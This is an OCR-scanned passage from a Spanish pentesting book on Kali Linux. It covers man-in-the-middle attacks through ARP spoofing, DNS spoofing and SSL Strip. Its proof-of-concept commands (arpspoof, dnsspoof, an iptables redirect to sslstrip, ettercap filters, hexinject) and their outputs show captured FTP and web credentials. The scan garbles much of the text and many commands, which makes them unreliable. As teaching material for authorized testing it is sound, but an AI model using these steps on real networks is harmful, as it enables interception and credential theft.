con  Ettercap  y  visual  izar  las  nuevas  peticiones  con  URLSnarf. 

Web  MITM.  Esta  herramienta  permite  gencrar  certificados  falsos  person  alizados  y 
autofirmados,  como  realiza  la  herramienta  dc  Windows  Cain  Abel .  El  objetivo  es  que 
mediante  la  realization  de  un  MITM  a  la  victima  y  DNS  Spoofing  esta  final  ice  realizando  la 
petition  de  un  sitio  web  al  atacante  y  este  le  proporcionara  un  eertificado  falso,  el  cual  si  la 
victima  aeepta,  cifrara  la  conexmn  con  el  atacante,  por  lo  que  sus  crcdenciales  quedaran  a  la 
vista  de  este. 

) 

Para  sniffar  o  husmear  la  informacion  que  se  puede  consultar  en  una  red  de  datos.  Kali  Lima 
proporciona  un  listado  de  herramientas  que  se  detallan  a  continuacion: 

-  Dsniff  Esta  herramienta  permite  sniffar  cl  trafieo  y  filtrar  crcdenciales  de  protocolos 
i n sc g uros.  Ademas,  es  el  nombro  dc  la  suite  que  dispone  de  diferenles  herramientas  para 
aplicar  fiilros  a  dislintas  funcionalidades  como  por  ejemplo,  obteneion  de  cookies  t  filtrado  de 
peticiones,  mails,  imagenes,  etcetera. 

-  flex  inject.  Esta  herramienta  permite  sniffar  e  inyeciar  en  el  trafieo,  Esta  inyceeidn  permite 
modifkar  el  trafieo  real  por  informacion  falsa,  por  ejemplo  la  modificacion  del  trafieo  ARP, 
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la  inclusion  de  information  falsa  en  un  envio  de  un  correo  eloctronico,  la  modification  del 
protocolo  HTTP  v  la  information  de  6ste,  etc&era.  Es  una  herramienta  realmente  interesante 

Mailmarj.  Esta  herramienta  permite  smffarz  1  correo  electro nico  que  utiiiza  los  puerttis 
SMTP  y  POP.  g\ 

-  Msgsnarf.  Esla  herramienta  permite  snifjar  el  trafico  del  chat  como  por  ejemplo 
Messenger. 

Wires  hark.  El  analizador  de  trafico  por  excel  end  a,  lives  hark  permite  procesar  y  anal  tzar 
todas  las  tramas  de  red  que  son  eapturadas  en  un  adaptador  de  red,  Esta  herramienta  permite 
realizar  gran  cantidad  de  ataques  de  red. 


2.  Envenenamiento  de  redes 

Como  se  ha  vislo  anleriormente  Kali  Linux  proporciona  un  listado  de  aplicaciones  para  el 
envenenainiento  y  procesaraiento  de  informacion  que  circula  a  traves  del  adaptador  do  red.  HI 
principal  escollo  que  se  puede  encontrar  el  pentester  en  el  instante  del  envenenamiento  de  redes 
es  el  protocolo  que  estas  utilicen.  Hoy  en  dla,  la  inmensa  mayoria  de  redes  utilizan  el  protocolo 
IPv4,  para  el  cual  existen  gran  cantidad  de  ataques.  Aunque  por  otro  lado  existe  el  protocolo  IPv6, 
que  es  el  future  de  la  informatica,  para  el  cual  existen  tamhien  di versos  ataques  que  afectan  a  la 
confidencialidad  de  los  usuarios. 


Ataques  a  IPv4 

En  este  capitulo,  mas  adeifinte,  se  estudiaran  di  versos  ataques  o  formas  de  atacar  la  confidential  3  dae 
de  los  usuarios  en  una  red  IPv4.  A  continuation  se  enumeran  diversas  formas  de  ataque  bajo  estc 
protocolo: 


1 .  ARP  Spoofing. 

2,  DNS  Spoofing. 

3,  SSL  Strip. 

4.  SSL  Sniff. 


5.  Hijacking. 

6.  Ataque  VPN  con  PPTP 

7.  DHCP  Rogue. 

8.  AP Rogue. 


Ataques  a  IPv6 

En  este  capftulo  lambien  se  estudiarin  herramientas  que  hacen  que  Kali  Lima  real  ice  pentesting  en 
redes  I  Pv6.  A  eontinuacidn  se  enumeran  una  serie  de  ataques  que  pueden  afectar  a  la  confidencialidad 
de  los  usuarios  en  este  tipo  de  redes: 

-  Neighbor  Advancement  Spoofing. 

-  SLAAC.  1 

-  DHCPv6.  I 
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En  resumen,  Man  In  The  Middle  mechanic  la  tecnica  de  ARP  Spoofing,  es  un  ataque  en  el  que  el 
ataeante  crea  la  posibilidad  de  consultar,  inserter  o  modificar  mformacibn  que  hay  en  un  canal  emre 
2  miquinas  sin  que  ninguna  de  esas  maquinas  conozca  dicha  siluaeibn.  En  otras  palabras,  un  usuario 
con  malas  intencioncs,  se  colocara  entre  el  equipo  1  y  el  equipo  2,  C’uando  el  equipo  1  envfe  ir&lico 
al  equipo  2#  dicho  trafico  pasara  por  el  equipo  del  ataeante  en  primer  lugar. 

El  protocol©  ARP  tiene  dos  lipos  dc  mensajes,  request y  reply.  Un  paquete  request pregunia  mediante 
broadcast  a  lodos  los  elementos  de  (a  red  por  la  direccion  flsica  que  tiene  una  direccion  IP  conereta 
El  element©  que  Lenga  dicha  direccion  IP  contestara  con  un  ARP  reply  indicando  su  direccion  iisica 
en  la  cabecera.  De  este  mode  los  cquipos  aprenden  a  asociar  direcciones  fisicas  a  direcciones  IP. 
Si  un  usuario  malintencionado  utilizara  los  ARP  reply ,  para  enganar  v  envenenar  las  tablas  de  otros 
elementos  se  podria  capturar  el  rrafieo  que  no  es  dirigido  para  dicho  usuario  nialieioso. 


Como  ejemplo  se  expone  ia  siguiente  situacion:  un  ataeante  utilizara  una  herramienta  adecuada, 
como  puede  ser  ettercap  o  arpspoof,  para  Uevar  a  cabo  el  ARP  Spoofing.  El  ataeante  envenenara  las 
tablas  ARP  de  las  vretimas,  enviando  mensajes  arp  reply  “engahando"  a  los  objetivos.  Este  tipo  de 
ataques  se  realiza  en  redes  conmuiadas,  ya  que  en  redes  con  hubs  no  es  neeesario,  este  detalle  es  de 
suma  importancia. 

El  estado  inicial  dc  la  tahla  ARP  de  la  victima,  con  direccion  IP  1 1 ,0.0.3,  tiene  el  siguiente  aspecto: 


Direccidn  IP 

Dirccriftn  MAC 

11,0,0.1  (router) 

CA:FE:CA:FE<CA:FE 

El  estado  inicial  dc  la  tabk  ARP  del  router,  con  direccion  IP  1 1.0.0. 1,  tiene  el  siguiente  aspecto: 


DirecctAn  IP 

Direccion  MAC 

1 1 .0.0.3 

FA:BA:DA:FA:BA:DA 

E3  ataeante  enviaraun  par  de  arp  reply ,  uno  a  la  victima  y  otro  al  router,  con  ia  inlencion  de  envenenar  y 
falsear  la  informacion  anterior.  Si  el  ataeante  dispone  de  la  direccion  MAC  AA:BB:AA:BB:AA;BB. 
ias  tablas  AR  P  de  los  elementos  anteriores  quedaran  de  la  siguiente  manera: 


Direccion  IP 

Direccion  MAC 

1 1 .0,0,1  (router) 

AA:BB:AA;BB:AA:BB 

El  estado  inicial  de  la  tabla  ARP  del  muter .  con  direccion  IP  1 1  ,0*0*1,  tiene  el  siguiente  aspecto: 


Direccion  IP 

Direceidn  MAC 

11.0.0.3 

AA:BB:AA:BB;AA:BB 

De  csta  manera  todos  los  envios  de  tr&fico  que  realice  la  victima  a  Internet  pasaran  por  la  maquina 
del  ataeante,  capturando  cookies,  eredenciales,  m form ac ion  de  navegacion,  y  todo  el  trafico  no 
cifrado,  comprometiendo  la  privacidad  y  la  confidencialidad  del  usuario. 
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Algo  que  hay  que  tener  en  cuenta  y  que  ha  causado  problemas  a  muchos  auditors  y  usuarios 
malintencionados  es  el  comportain iento  de  los  dispositivos  mdviles  fretite  a  ia  Lecnica  ARP  spoofing, 
Se  recomienda  que  se  util  ice  una  maquina  fisica  para  llevar  a  cabo  d  envenenamiemo,  ya  que 
se  pueden  sul'rir  problemas  de  funcionamiento  utilizando  inaquinas  virtuates  para  llevar  a  cabo  d 
proceso. 


Proof  Of  Concept:  arpspoof  como  piedra  base 

En  esta  prueba  de  eoncepto  se  realizara  un  ataque  de  ARP  Spoofing  basico  mediante  el  uso  de 
la  herramienta  arpspoof  de  Kali  Linux.  Ademas,  se  mostrara  el  proceso  complete  y  otro  tipo  de 
herramientas  que  permiten  filtrar  y  mostrar  informacion  interesante.  El  ©scenario  es  el  siguiente: 

La  victima  tiene  configurada  la  direccion  IF  192. 1 68.0.59. 

El  atacante  tiene  configurado  la  direccion  IP  192.168.0.60. 

|  -  El  muter  tiene  configurada  la  direccion  IP  1 92.168.0.248. 

El  atacante  necesita  envencnar  la  tabla  ARP  de  la  victima  indicandole  que  la  direccion  lisica  de! 
router  ha  cambiado.  Para  ello  se  ejecutara  la  siguiente  instruction  arpspoof -i  <interfaz  red>  -t 
< direccion  IP  victima>  <direccion  IP  router>.  En  la  imagen  se  puede  visuali/ar  como  se  produce 
el  envenenamiento  de  la  tabla  ARP. 


r  do  Alkali :  i  #thG  t  192  , ]  S8 .0 .59  192. 168 .9 . 24fi 

l:9:27:f4;0a:lf  6:0:27  :tl :  f2  :8  0M  *?\  arp  nply  192.168,0.248  1*  at  0:9:2 7:f4: 
to:  If 

3:0:27; f4 :Be : If  B:0:27:b7 ;  f2  0906  42:  arp  reply  192.168,0.248  ir  at  9ifl;27:f4: 

to:  If 

3;tf;27:t4:S«:lf  8  :B:27;tJ?;  f2  :B  0B06  42:  arp  reply  192.168.0.240  is  at  B:®;27:f4: 
to;lf 

3 :B:27;f4;Be:lf  fl :0 :2/:b7: f2:B  8806  42;  orp  reply  192 . 16B.0 .249  Is  at  B:S:27:f4; 
to:  If 

Imagen  OK  .01 :  Envcnenaimento  tie  ia  labia  ARP  de  la  victima. 


Una  vez  que  se  ha  envenenado  a  la  victima  se  puede  comprobar  la  tabla  ARP  de  esta  y  verificar 
que  la  direccion  fisica  del  muter  ha  cambiado.  Ahora  cuando  !a  victima  envie  trafico  hacia  Internet 
la  enviara  primero  al  atacante  y  este  la  enviara  hacia  ei  router,  pero  para  que  esto  ultimo  ocurra  se 
debe  habilitar  el  forwarding ,  para  ello  se  ejecuta  la  siguiente  instruccion  echo  I  >  /proc/sys/net/ipv4/ 
ip  forwarding.  Ademas,  para  que  los  paquetes  que  llegan  al  router  pasen  primero  por  el  atacante  se 
debe  ejecutar  el  arpspoof  sobre  el  router.  ! 

roa  tilled  1 1  echo  1  >  7proe/*ys/nflt/ipv4/lp_forw»rrt 
r  ootjUK.jli  arpspoof  - i  eth0  -t  192 .168 .8 .248  192.16BQ.59 

B;0:27: f4 :0a :lf  «B:91;fS;2d:33:41  0836  42:  arp  reply  192.168.0.59  is  at  8:0:27 :f 
4 : 6s ; l f 

B:0:27; f4 «B:S1 ;f5:2tf:33:4l  0906  42:  orp  reply  192,168.0.59  is^at  9:0:27;f 
4;8e: If 

0;0;27;f4:B«:l  r  tiQ  ;91 1  f5 :2cJ;33 :41  0086  42:  arp  reply  192.169.0,59  is -fit  8:8  27;  f 
4:89 rlf _ 

Imagen  UK.02:  Envenenamiento  del  router  y  habilitar  el  reenvlo  dc  paquetes. 

Para  visualizar  rapidamente  que  el  tralieo  de  la  victima  circula  a  traves  del  atacante  se  puede 
utilizar  la  herramienta  Hues  hark.  Como  se  puede  apreciar  en  la  imagen  el  trafico  de  la  victima  esta 
circulando  a  traves  de  la  tarjeta  de  red  del  atacante. 
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Imugen  08.10:  Capture  de  iraficu  dc  la  victima  medianie  ARP  Spoofing, 

En  este  instante  cuando  la  victima  utilice  protocolos  noseguros  toda  la  information  sera  visualizada 
por  el  ataeante,  pudiendo  eapturar  cookies  de  scsion,  imageries,  ficheros,  credeociales  de  acceso  a 
sisiemas,  etcetera.  Kali  Linux  proporciona  una  serie  de  aplicaciones*  por  ejemplo  la  suite  dsnifj con 
la  que  sc  pueden  realizar  una  serie  de  operaciones  para  filtrar  contenidos  o  recti perar  informacidn 
interesante  del  flujo  de  dales  que  circulan  por  la  larjeta  de  red  del  atacante.  ‘ 


(  on  ia  herramienta  drift  net  se  pueden  mostrar  las  imigenes  que  la  victima  esta  visual  izando,  como 
sc  puede  observer  en  la  imagerr  Adenitis,  la  herramienta  UR LSnarf  perm i te  conocer  las  peticiones 
L  RL  que  la  victima  esta  realizando,  el  desempeffio  de  esta  herramienta  hace  que  sea  de  suma  utilidad. 


f  oot&kali:  -#  driftnet 


tmagen  08,04:  Ejecucion  dc  driftnet. 
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r  ootjaka  Li  :  -tt  urlsnarf 

urlsnarf;  listening  an  ethfl  [tcp  port  B0  or  port  0000  or  port  3120] 

192. 16B. 0.59  -  -  [68/Apr/20I3 : 13 :22  :46  +0200]  "G£T  http ;  //www,  google  .com/  Hi  TP/i 
.1"  -  -  "Rozilla/5 ,0  (Windows  NT  5.1;  rv :  10 .0)  Gecko/20100181  Firefox/IB.Q" 
192 . 160  ,0,59  -  -  [00/Apr/2013:13:22 :46  +0200]  "GET  http://www-googU.es/  HTTP/1. 
1 "  -  -  "MoziYLo/5  h@  (Windows  NT  5.1;  rvslO.O)  Gecko/2S1G0101  Fi rafox/13 .0" 
192.lGfK0.S9  -  [00/Apr/2013:13:22 '46  +0200]  "GET  http://WWW.gaDglQ.es/CBi7vv3fi 

B^iebhp&action=te=l  7259,10 167 ,39523,4068 11 6  *480 1569 ,400 1947 ,4631959 ,4001975,4082 
464 ,4002734 ,4003510 ,4003551 ,4003917 ,4004036, 4804101 ,4004214 ,4004257, 4004271,408* 
3l9J4GQ4334>4B04341,4BO4653UgO4G9/,4fla4fi97,4flfl472B,4fl@4766,4O0*?BB,  460*6^480* 

Imogen  08.05;  Ejeeueion  de  URLSnarf. 


La  herramienta  dsn  iff  permite  realizar  la  captura  de  credenciales  que  viajan  por  protocolos  no 
seguros. 

En  la  imagen  se  puede  visual izar  la  captura  de  credenciales  del  protocolo  FTP,  la  cual  podria  verse 
con  Wires  hark,  pero  con  el  uso  de  dsniff  evita  tener  que  real  izar  la  busqueda  en  el!  fichero  CAR 

rootlhal \ dsniff 
dsniff:  'Listening  on  ethQ 

34/03/13  15:00:11  tcp  192 .168.0 .59.1055  134.0.11.133.21  (ftp) 

JSER  anonymous 

IASS  moziVlfl@exaiiiplfl.com 


04/08/13  15 ;8B :23  tcp  1 92 , 1S8 .8 ,S9 . 1856  *  134 .0. 11 . 133 .21  (ftp) 

JSER  pablo 

PASS  I23abc>  _ _ 

Imagen  08.06:  EjecuciAn  dc  dsniff. 

Por  ultimo  se  va  a  estudiar  el  uso  de  la  herramienta  hexinject,  Esta  interesante  herramienta  permite 
sniff ar,  e  ineluso  modificar,  los  paquetes  que  drculan  por  el  adaptador  dc  red  del  atacante.  En  otras 
palabras  permite  visualizar  el  contenido  en  hexadecimal  o  "en  crude/'  y  podcr  modificar  en  tiempo 
real  dicha  informacioti. 

A  continuacion  se  enumeran  una  serie  de  parametros  interesantes  para  el  fimeionamiento  dc  hexinject: 


Parametro 

Description 

-s 

Modo  sniffer. 

-p 

Modo  inyeccion* 

-r 

Modo  cmdo  o  rmu 

-i 

Interfaz  de  red. 

-c 

Nurnero  de  paquetes  a  capturar 

-f 

Filtro  a  aplicar. 

Por  ejcmplo  si  se  requiere  stnffar  cl  paqueie  y  iiltrar  ciertos  contcnidos  se  puede  ulili/ar  la  siguiente 
instruction  hexinject  -s  -/  ethO  r  \  strings  grep  Host  ,  Hay  que  rccordar  que  el  M1TM  debe  estar 
funcionando  simuitaneamente. 


220 


Pentesting  con  Kali 


rooi^kali:-#  hexinjflct  -s  i  Gth0  -r  j  strings  |  grep  Host' 

Host:  www,  flu -pro]  ect  .com 

Host:  www. flu -project .com 

Host :  pagead2 . googlssyndicat ion . com 

Host :  pagead2 . googlesyndication . com 

Host;  www*  flu -pro]  ect  .com 

Host:  www .  flu  -pro]  ect .  com 

Host:  www.flu-project.com 

i  Host;  wwwufTu-prol  act  .com _ _ _ 1 

Image  n  08,07:  Ljccucion  de  hex  inject  en  modq  sniffer 

i 

Pero  quiza  lo  mas  impactante  de  hexinject  sea  su  sencillez  para  inyectar  o  reempJazar  contenido  en 
los  paquetes  que  el  atacante  esta  interceptando.  En  el  siguiente  ejemplo  se  puede  observar  como  el 
contenido  sniff  ado  modifica  el  paquete  ARP  para  cambiar  ana  peticion  por  una  respuesta*  Con  esie 
ejemplo  se  muestra  el  polencial  de  la  herramienta.  La  sintaxis  es  sencilla  hexinject  -s  -i  ethO-f  arp  ' 
-c  1  |  replace  ' 06  04  00  01 '  '06  04  00  02' \  hexinject  p  -i  ethO .  Para  visualizarlo  en  pantalla  no  se 
inyecta,  como  se  puede  ver  en  la  imagen. 

roottfkaLi  hexinject  -s  -i  eth0  -f  arp1  -c  1  |  replace  ’36  04  00  01  1  04  0 

0  02' 

FF  FF  FF  FF  FF  FF  00  15  5D  80  C9  02  0B  06  00  01  00  00  06  04  00  02  00  15  50  00  C9 
02  C9  AS  00  E6  00  00  00  00  00  00  C0  AS  00  FC  00  00  00  08  00  00  00  00  00  00  00  0 
0  00  06  00  00  00  00 _ 

Imogen  OK, 08:  tnyeccion  o  modifreaci6n  del  contenido  de  tin  paquete 


Proof  Of  Concept:  Ettercap  y  los  filtros 

En  esta  prueba  de  eoneepto  sc  utiliza  ettercap  que  posibilita  realizar  Man  In  The  Middle  sobre  un 
dispositive  de  la  red.  Ettercap  tambien  pennite  aplicar  filtros  sobre  la  informacion  que  se  recite  de 
la  vtcti ma,  con  el  fin  de  obtener  la  informacion  ulil  y  despreciar  la  no  relevante,  o  incluso  con  la 
posibilidad  de  modifiear  el  contenido  que  se  reenvia  a  ia  victima.  Estas  situaciones  pueden  ser  utiles 
para  el  pentester  en  eiertas  ocasiones, 

Realizar  Ml  I  M  con  Ettercap  es  realmente  sencillo  si  se  realiza  desde  la  interfaz  grafiea.  Se  deben 
escanear  los  equipos  de  la  red  y  elegir  los  dos  targets.  Una  vez  elegidos  estos  se  lanza  el  M1TM  y 
leniendo  en  cuenta  que  se  pueden  preparar  filtros  previos. 

A  continuation  sc  especifica  un  ejemplo  de  liltro  con  el  que  se  busca  rcemplazar  las  imageries  que 
se  solicitan: 

if  (ip. proto  «  TCP  tcp-.src  ==  60)  ( 

replace ("img  sr c«",  "img  erc=\/'hitp : //www. flu-pro j ect , com/ logo ,pnq\ff  " ) ; 

)  J 

Para  compiler  d  filtro  se  ejecuta  la  orden  ette /filter  <nomhre  fittro>  -ofiltro  ef.  Despues  se  debe 
eargar  dicho  liltro  mediante  la  interaction  con  Ettercap  en  la  pes  tafia  Filters.  Este  sislema  de  filtros 
aporta  una  funcionalidad  extra  muy  interesante  a  Ettercap,  la  cual  es  muy  similar  a  fusionar  las 
apl  icaci  o  n  es  arpspoaf  y  hexinj ect . 
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DNS  Spoofing 

Esta  teenies  consiste  en  falsear  los  resultados  de  las  consults  DNS  de  una  victima.  El  objciivo  de 
este  ataque  es  que  la  resoluci6n  de  nombres  de  dominio  sera  falseado  por  ei  atacante  y  la  victims 
recibira  una  direceion  IP  falsa  a  la  qiie  se  coneclara,  pensando  que  es  el  dominie  verdadero,  Este 
ataque  se  apoya  en  la  lecnica  de  MITM,  gracias  a  ARP  Spoofing  o  Rogue  AP. 

El  ataque  puede  ser  local  o  remote  y  esta  diferenek  si  es  importante,  Si  el  servidor  DNS  se  encuentra 
en  la  red  local  o  LAN,  el  atacante  debe  envenenar  las  tablas  ARP  de  la  victims  y  del  equipo  que 
dispone  del  servidor  DNS  local.  No  se  debc  envenenar  la  tabla  ARP  del  router  va  que  la  pet j cion 
al  DNS  sera  local.  Sin  embargo,  si  el  servidor  DNS  es  remote,  es  decir,  se  encuentra  en  Internet,  el 
envenenamiento  se  debe  realizar  entre  la  victima  y  el  router :  Esta  aclaracion  es  importante  para  que 
el  ataque  tenga  exito. 

Por  ultimo  mdicar  que  el  objetivo  del  ataque  sera  proporcionar  una  direceion  IP  falsa  con  la  que  la 
victima  se  co  nectar  a.  La  direceion  TP  a  la  que  se  eonecte,  generalmente,  proporcionara  un  phishing 
o  un  sitio  web  con  un  exploit  que  se  lanzara  sobre  el  equipo  que  realiza  la  peticion  o  algun  derivado 
de  estos  dos  ataque s  expuestos. 


Proof  Of  Concept:  Controlando  las  resoluciones  DNS 

Tii  esta  prueba  de  concepto  el  atacante  oontrolara  las  resoluciones  de  las  petieiones  DNS  de  la 
victima  mediante  el  uso  de  la  herramienta  dnsspoof  y  uiilizando  arpspovf  para  realizar  la  tdcnica 
MITM. 

EI  escenario  es  el  siguienle: 

Una  victima  con  Microsoft  Windows  XP  SP3  y  utiliza  un  servidor  DNS  extern o  a  la  red 
local  por  ejemplo  el  DNS  de  Google  8.8. 8. 8. 

Ur  atacante  con  Kali  Linux , 

-  Atacante  y  victima  se  eneuentran  en  la  misma  LAN.  El  atacante  intereeptara  las  petieiones 
y  respuestas  DNS  proporcionando  la  direceion  IP  que  el  quiera  mediante  la  construccion  de 
un  fie  hero  hosts  especial. 


Tin  primer  lugar  el  atacante  realizara  MITM  a  la  victima  mediante  ARP  Spoofing,  Como  yo  se  ha 
estudiado  auteriormente,  realizar  dicha  operativa  es  algo  sencillo  con  la  herramienta  arpspoof, 
Una  vez  el  trafico  circula  por  el  equipo  del  atacante,  se  construye  un  tichero  hosts  con  el  que  se 
eonfigurara  la  herramienta  dnsspoof  En  este  fiehero  se  especificaran  las  direcciones  IP  acordes  a  los 
nombres  de  dominio  que  se  quieren  spoof  ear. 


El  siguienle  fragment©  Simula  el  tichero  de  texto  edilado: 


192 ,168*0*57 
192.168.0,57 
192.168.0.57 
192.1 68,0,57 


* . tuenti *  com 
tuenti . com 
+ , f acebook ♦ com 
facebook , com 


Una  vez  ureado  el  fiehero  se  debe  ejecutar  la  herramicnta  dnsspoofcav  la  siguieme  sintaxis  dmspoof 
-i  ethO  —f  <fichero  de  hosts>> 


roQt|Pmll;-t  dnsspoa^  -i  ethS  -f  hosts  -  txt 

dnsspoof;  listening  a n  fcthO  [udp  dst  part  S3  and  not  s re  192,160,0.57] 

192-160-0-56,1055  »  8.0,0.0.53;  661+  A.?  aststiCDsflkl.tuenti.com 

192.168,6.56-1055  >  8. 0.0,0, 53;  681+  A, 7  aststicDsakl  , tuenti -com 

1 92 - 168 .6.56* 1055  >  0.0.0,6,53:  1272+  A?  www.tuentl.com 

192 . 168 .6 .56 . 1655  >  9.0,0,3,53:  1272+  A?  www.tuentl.com _ _ 

Imagen  08  09:  Resolution  de  n ombres  falsa  eon  Jnsxpoof 

/ 

Tal  y  como  sc  puede  apreciar,  las  resoluciones  de  la  victim  a  al  acceder  al  sitie  web  luenti.com  se 
reatizan  con  una  direccion  IP  falsa,  que  coincide  con  la  del  atacante.  De  esta  manera  tan  sencilla  se 
puede  realizar  un  phishing  casi  perfeclo.  teniendo  en  cuenta  que  el  sitio  web  es  una  clonacion  del 
original. 

Por  otro  lado.  la  victima  puede  detectar  esto  si  al  comprobar  el  estado  de  su  cache  descubre  que  la 
resolucion  de  nombres  de  dotninio  hacia  tuenti  se  han  quedado  en  una  direccion  IP  local,  algo  que 
extranaria,  y  mucho,  al  usuario  final. 


Honbre  de  registro  . 

.  :  secure.tuenti.com 

Tipo  de  regie tro  „  * 

,  :  1 

Tiempo  de  oida  .  *  * 

-  :  47 

Long  it ud  de  dates: 
Seccidn  . 

*  ;  4 

:  re  r;  pi  tost  a 

Un  registro  Chost>  * 

.  s  1V2.16U.€I.07 

st at ic  * tuent i.eoro 

Munbre  d,e  registro  * 

.  :  itAtic.tuenti.cQn 

Tipo  de  registry  .  * 

,  :  1 

T  ienpo  tic  v  ida.  .  „  . 

,  ;  1 

Longitud  de  dates 

.  :  4 

Secc ion  .  -  -  .  -  .  . 

-  respue sta 
.  :  1« -168. 0.57 

Uft  registro  Chest)  « 

www  .  s  t  aprbadware  , »  rg 

Nombre  de  regisfcro  * 

.  -  www .stopbadware .erg 

Tipo  de  registro  »  -. 

A  * 

Tienpo  de  uida  ,  .  _ 

.  i  285 

Longitud  de  datos 

,  :  4 

Section  • 

:  respuestA 

Regis tro  C NAME  .  _  _ 

.  :  cf-ss 118624-pro tected-wuu_ stopbadware . org 

tuenti. con 

Nonbre  de  registro  . 

-  -  tuent i .con 

Tipo  de  registry  *  , 

.  :  1 

T ienpo  de  v ida  -  .  . 

«  2  1 

Longitud  de  dates 
Section 

-  =  4 

:  re spue st a 
.  :  192.168.0*5? 

Uri  reglstro  Chest >  , 

Imagen  OS- 10:  Cache  DNS  maniputadu  apurUando  a  la  direccion  IP  del  atacante. 


For  ultimo  comcntar  que  se  podrla  utilizar  webmitm  para  generar  un  eertificado  autofirmado,  el  cual 
sena  proporcionado  a  la  victima  para  suplantai  conexiones  HTTPS,  HI  problema  de  esta  accion  es 
que  el  navegador  infomiard  de  que  la  identidad  del  servidor  no  se  oorresponde  con  el  certificado, 
En  un  entorno  donde  los  usuarios  eaten  acostuinbrados  a  aceptar  eertificados  que  no  pueden  ser 
yalidados,  no  existiria  problema  ninguno,  ya  que  estos  verian  con  buenos  ojos  dicha  accion. 
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SSL  Strip 

En  2009  el  hacker  Stoxie  Marl  inspike  demostrd  e  implementd  como  llevar  a  cabo  un  hijacking  de 
scsion  a!  protocola  HTTPs,  Se  encargo  de  implementar  un  script  en  Python  con  ei  que  Itevar  a  cabo 
dicho  ataque,  cuyo  objetivo  es  el  dc  forzar  el  cambio  de  tipo  dc  eonexidn. 


Mediante  la  realizacldn  de  un  Mi  l  M  ei  atacante  intercepta  las  peticiones  que  la  victima  realize  El 
servidor  redireccionara  las  peticiones  111  I  P  de  la  victima  a  H  I  TPs  y  sera  en  este  instantc  euando 
el  atacante  filtrara  el  HTTPs  devolviendo  a  la  victima  HTTP  Se  puede  realizar  una  instaixtSnea  del 
entomo  de  la  siguiente  manera: 


La  conexion  entre  el  atacante  y  el  servidor  viaja  bajo  HTTPs. 

La  conexion  que  el  atacante  devuelve  a  la  victima  viaja  bajo  HTTP, 


Proof  Of  Concept:  SSL  Strip 

En  esta  prueba  de  concepto  se  utilizara  Mi  I'M  junto  a  la  tecnica  SSL  Strip  con  el  fin  de  engafiar 
al  usuario  y  presentar  el  contenido  seguro  de  manera  insegura,  (  itando  la  victima  introduzea 
credentials  o  inicic  sesion,  el  contenido  de  esta  y  de  las  credo n dales  scran  capturadas  en  texlo 
piano  per  el  atacante, 

El  escenario  es  el  siguiente: 

-  La  victima  dispone  de  Microsoft  Windows  XP  SP3  y  utiliza  un  navegador  como  Ft  ref  ox 
o  Internet  Explorer. 

-  El  atacante  uliliza  Kali  Linux . 

Victima  y  atacante  se  enenentran  en  la  misma  red  local. 


En  primer  lugar  se  realiza  el  M1TM  sobre  la  victima  con  arpspoof  Una  vez  que  el  trafieo  circula 
a  traces  del  atacante  se  debe  afiadir  una  redirection  de  trafieo  en  ipiables .  Esta  redirection  lo  que 
indiea  es  que  todo  el  trafieo  que  se  dirija  al  puerto  80  sera  posteriormente  redirigido  al  1 0000.  o  at 
puerto  que  se  ie  indique.  En  el  puerto  10000  se  encontrara  una  apltcacion  denommada  ss  Is  trip  que 
se  encargara  de  evitar  que  la  victima  acceda  a  trafieo  HTTPS, 

''Crootigkall: iptaDles  'T  nat  -A  P REROUTING  -p  tep  - -destination-port  flO  -j  RED 
ECT  --ttJ-ports  I03&9 

c  aoUJ-kdli  :  -#  sals  ? 

ssl  scan  sslsniff  sslstrip 

r«M>r@kitli;-'#  ssls 

s  si  sc  an  s  si  sniff  s*l  sf  ri  p 

raotQkati  ssls 

sslscsn  sslsniff  sslstrip 

fGottfkdll*  tt  sslstrip  w  s%\ 

sslstrip  a. 9  by  Mojtis  MarlinsplHP  running.,, 

Imogen  08.1 1 :  <  oidigurncion  dc  SSL  Strip 


Una  vez  que  se  tiene  configurada  la  aplicacion  se  debe  esperar  a  que  la  victima  acceda  a  recursos 
que  en  conditions  normales  in  an  sobre  HTTPS.  En  la  imagen  se  pueden  visualizar  las  prueba  s  que 
se  ban  realizado  con  email  o paypal. 
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* <hj  ifikii I  j  :  -#  cat  ssl  |  grep  i?3abc. 

c  ont inue«ht  tp%3A%2F%2Fmail . google , com%2Fmeil%2FSso rv ice-mail & rm=f al se£dsh= 1 7 1 6901 
494679405570361 1  mpl =do f  aul. 1 4st c  =  1 SGALK^DEqeTuDl ol Y4pstMsg=l SdnConn-fichacKConntc t 
1  on=4c  hac  k  a  dD  oma  ins  =y o u  t  uM i  i  m  aS  t  mp=&5a  c  T  ok  =*&_ut  f  8«%E2%9B%B36tig  rasp onaa^%2 1 A  9 1 1 
3HXatR9gmkQt  MZYhE  - QUMgl AA A8gUgA AA AwqAPaF  I  3GSFohzy Ib64 j  MPokHZNMind7T  T  zo  f  KYuAGiniaKl 
3« i G  P9G  4 1 g£ I GoT  v  7k  N89u X V7  f ■ Q 2 Vg  vGb vl  j  c  i  s dAP  hsgpLWe23 e  7al AKBc  c  0HhZ  f SqoLebXs j  D j 6M_ 
¥ M3u AST 5  - _CW2  MSozl k  »PuO I S - Q  vehCdgQQ j 3ou  u4z  zL  hbWl at  z  dnbAwy Ak 1 K  ?9d  r f  7 Oe  Hm0K  Ri - 7 
12v30cKDJ I sQFh)(Yh*Tv09 lEfl4TouL bOOJ zL9b - uwX3  NAwwfiyd rU9y fiYUSKOxBuHVc  UBi vgQkE4o7l 
hiJati7J01gKAI01q.evetfeBmq_g-fttzvtrF4dl0JkA7NPg4Effioil“kflli4Passwd-123abc  .Gsigntn 
-Accede rSPersigtantCookie^yesfi  nmShown-1 

csrf^odal ,  retu medCs rf  =w9XJut I bAxni rr-7rPBwHhc 9zmnW34_£v2eINX_zX0NHgbu2J  WH!|_C 
Eq76-Xb0_LD2g9NqgdAzliFicanJG5M3H2Y0auWA7FJi.skR9OO-PLh6NZ54lagirT1araail=kali^43kaXi. 
comSlogin_pas5word-123abc  ^submit  , x-5nt  r a rfr browse r_nama=Flrof ox 4 browser  version= 

Jmagen  D8 A  2:  Obtendon  de  credent iates  de  silios  web  que  iriao  bajo  HTTPS. 


Lo  linico  que  el  usuario  o  victima  vena  es  que  en  la  barra  de  direcciones  el  protocolo  que  se  esta 
utilizando  es  HTTP  y  no  HTTPS  como  seria  lo  normal. 


Hijacking 

El  hijacking  o  secuestro  de  sesion  consiste  en  apoderarse  de  la  sesion  iniciada  por  un  usuario  y  poder 
utilizarla  para  el  bendicio  del  atacante.  Este  tipo  de  teenieas  so  realiza  desde  protocolos  de  la  caps 
